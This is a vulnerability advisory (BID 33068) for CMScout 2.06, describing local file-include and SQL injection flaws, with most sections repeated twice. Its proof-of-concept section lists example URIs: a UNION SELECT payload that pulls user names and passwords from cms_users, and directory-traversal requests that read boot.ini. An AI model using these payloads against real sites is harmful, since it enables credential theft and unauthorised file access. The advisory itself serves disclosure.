CMScout Local File Include and SQL Injection Vulnerabilities
BID:33068
Info
CMScout Local File Include and SQL Injection Vulnerabilities
| Bugtraq ID: | 33068 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6726 CVE-2008-6725 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 30 2008 12:00AM |
| Updated: | Jul 06 2016 02:18PM |
| Credit: | SirGod |
| Vulnerable: |
CMScout CMScout 2.06 |
| Not Vulnerable: | |
Discussion
CMScout Local File Include and SQL Injection Vulnerabilities
CMScout is prone to multiple local file-include vulnerabilities and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit the local file-include vulnerabilities using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process. Information harvested may aid in further attacks.
The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMScout 2.06 is vulnerable; other versions may also be affected.
CMScout is prone to multiple local file-include vulnerabilities and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit the local file-include vulnerabilities using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process. Information harvested may aid in further attacks.
The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMScout 2.06 is vulnerable; other versions may also be affected.
Exploit / POC
CMScout Local File Include and SQL Injection Vulnerabilities
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[path]/index.php?page=mythings&cat=downloads&action=edit&id=null union all select 1,2,3,4,concat_ws(0x3a,uname,passwd),6,7,8,9,10,11 from cms_users--
http://www.example.com/[path]/admin.php?bit=../../../../../boot.ini%00
http://www.example.com/[path]/index.php?bit=../../../../boot.ini%00
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[path]/index.php?page=mythings&cat=downloads&action=edit&id=null union all select 1,2,3,4,concat_ws(0x3a,uname,passwd),6,7,8,9,10,11 from cms_users--
http://www.example.com/[path]/admin.php?bit=../../../../../boot.ini%00
http://www.example.com/[path]/index.php?bit=../../../../boot.ini%00
Solution / Fix
CMScout Local File Include and SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].